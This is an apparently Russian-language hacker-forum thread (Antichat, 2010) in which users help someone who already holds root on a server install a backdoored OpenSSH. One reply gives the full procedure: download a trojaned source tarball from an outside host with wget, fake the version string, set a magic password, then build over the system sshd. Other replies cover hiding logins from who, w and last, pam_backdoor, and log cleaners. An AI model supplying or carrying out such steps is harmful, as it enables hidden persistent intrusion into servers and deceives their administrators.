Нужна помощь в затроянивании OpenSSH

Discussion in 'Безопасность и Анонимность' started by buncho, 14 Jun 2010.

  1. buncho

    buncho New Member

    Joined:
    2 Jun 2010
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Есть рут. Хочу стать невидимым:) Думаю оптимальным решением станет затроянивание SSH. Стоит OpenSSH_4.3p2. В сети нашел патч только для версий 4.4 и выше. Сам вникать и писать код пока не хочу. Кто может чем помочь?
     
    #1 buncho, 14 Jun 2010
  2. slashd

    slashd Elder - Старейшина

    Joined:
    3 Sep 2008
    Messages:
    56
    Likes Received:
    15
    Reputations:
    6
    В файле version.h указать нужную версию, в includes.h прописать магический пароль вместо mAgic_p1ple. Перед make install не забыть сбекапить куда-нибудь /usr/bin/ssh и /usr/sbin/sshd.
    Code:
    # cd /tmp
# wget http://tools.xaker.ru/rulezzz.tar.gz.txt -O rul.tgz
# tar zxf rul.tgz
# cd openssh*
# vim version.h
# vim includes.h
# ./configure --sbindir=/usr/sbin --bindir=/usr/bin --with-pam --sysconfdir=/etc/ssh
# make && make install
# /etc/init.d/sshd restart
     
    #2 slashd, 14 Jun 2010
    1 person likes this.
  3. buncho

    buncho New Member

    Joined:
    2 Jun 2010
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Спасибо, а ничего что там версия 4.7?

    kill -9 $$

    да чтоб в логи не писалось и мэджик пасс был.

    кстати если админ наберет команду who, то я спалюсь все равно?

    и еще тупой вопрос: если демон не запуститься изза какой-либо ошибки, то всё, хана?
     
    #3 buncho, 14 Jun 2010
    Last edited: 14 Jun 2010
  4. slashd

    slashd Elder - Старейшина

    Joined:
    3 Sep 2008
    Messages:
    56
    Likes Received:
    15
    Reputations:
    6
    Без сюрпризов :)


    Если войдёшь под магическим паролем, то не спалишься.

    Если такое произойдёт, то восстанавливай из бекапа файлы sshd и ssh, затем перезапускай сервер.
     
    #4 slashd, 14 Jun 2010
  5. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    а какая тебе разница, что за версия там? Исправь в сорцах версию на ту что на сервере, админ разницы не почуствует.
     
    #5 diehard, 14 Jun 2010
  6. buncho

    buncho New Member

    Joined:
    2 Jun 2010
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    так я ж по ssh сам на сервак захожу. если сервис вырубится как я тогда зайду? :confused:
     
    #6 buncho, 14 Jun 2010
  7. slashd

    slashd Elder - Старейшина

    Joined:
    3 Sep 2008
    Messages:
    56
    Likes Received:
    15
    Reputations:
    6
    При рестарте sshd конекты не рвутся, так что есть возможность всё исправить.
     
    #7 slashd, 14 Jun 2010
  8. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    юзайте pam_backdoor меньше гемора.

    тыц
     
    #8 svesve, 15 Jun 2010
  9. slashd

    slashd Elder - Старейшина

    Joined:
    3 Sep 2008
    Messages:
    56
    Likes Received:
    15
    Reputations:
    6
    PAM хорош для ловли паролей системных пользователей и ещё как универсальное средство попасть в систему. Огромным минусом при юзании бэкдоров использующихне PAM это то, что такие сервисы, как SSH, сами заносят записи в utmp/wtmp и приходится каждый раз запускать логклинер.
     
    #9 slashd, 19 Jun 2010
  10. COMEJIbE

    COMEJIbE New Member

    Joined:
    6 Apr 2010
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    ORLY??

    имхо - стартануть новый веселый sshd на другом порту (с отдельным конфигом) из-под рута, так можно проверить работоспособность веселого sshd, хотя в упор не понимаю как с пом. веселого sshd можно стать невидимым, разве что не будет писать "Last login: Fri Jun 18 20:57:18 2010 from 127.0.0.1" нопремер для рута, но тогда остаются ps, who, w, last, соединения из netstat, которые надо скрывать
     
    #10 COMEJIbE, 20 Jun 2010
  11. slashd

    slashd Elder - Старейшина

    Joined:
    3 Sep 2008
    Messages:
    56
    Likes Received:
    15
    Reputations:
    6
    >но тогда остаются ps, who, w, last, соединения из netstat
    Отчасти верно, но в протрояненом SSH отключено занесение в логи utmp/wtmp(при подключении с магик паролем), отсюда следует что:
    1. В last он не светится
    2. who тоже его не показывает, так же как и w
    К сожелению светится в ps, netstat и т.д., но как показывает практика 90% админов этого даже не видят ;)
     
    #11 slashd, 20 Jun 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.